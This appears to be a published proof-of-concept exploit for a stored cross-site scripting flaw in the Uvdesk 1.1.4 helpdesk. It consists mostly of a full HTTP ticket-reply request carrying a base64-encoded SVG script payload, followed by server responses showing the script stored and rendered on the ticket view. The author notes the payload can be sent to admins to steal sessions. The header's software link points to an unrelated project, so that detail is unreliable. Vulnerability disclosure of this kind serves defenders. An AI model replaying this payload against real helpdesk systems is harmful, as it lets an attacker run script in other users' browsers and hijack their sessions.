    # Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)# Date: 14/08/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://www.uvdesk.com/# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 1.1.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.## Example XSS Stored in new ticket-----------------------------------------------------------------------------------------------------------------------Param: reply-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1Host: 127.0.0.1Content-Length: 812Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSkUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3Connection: close------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="threadType"forward------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="status"------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="subject"aaaa------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="to[]"test@local.host------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="reply"%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="pic"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="nextView"stay------WebKitFormBoundaryXCjJcGbgZxZWLsSk-------------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Mon, 14 Aug 2023 11:33:26 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateLocation: /uvdesk/public/en/member/ticket/view/1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: bf1b73X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:33:26 GMTSet-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=laxConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 398<!DOCTYPE html><html>    <head>        <meta charset="UTF-8" />        <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />        <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>    </head>    <body>        Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.    </body></html>-----------------------------------------------------------------------------------------------------------------------Redirect and view response:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Mon, 14 Aug 2023 11:44:14 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: 254ce8X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:44:14 GMTConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 300607<!DOCTYPE html><html>    <head>        <title>#1 vvvvvvvvvvvvvvvvvvvvv</title>[...]<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>[...]-----------------------------------------------------------------------------------------------------------------------XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.

Tag

#windows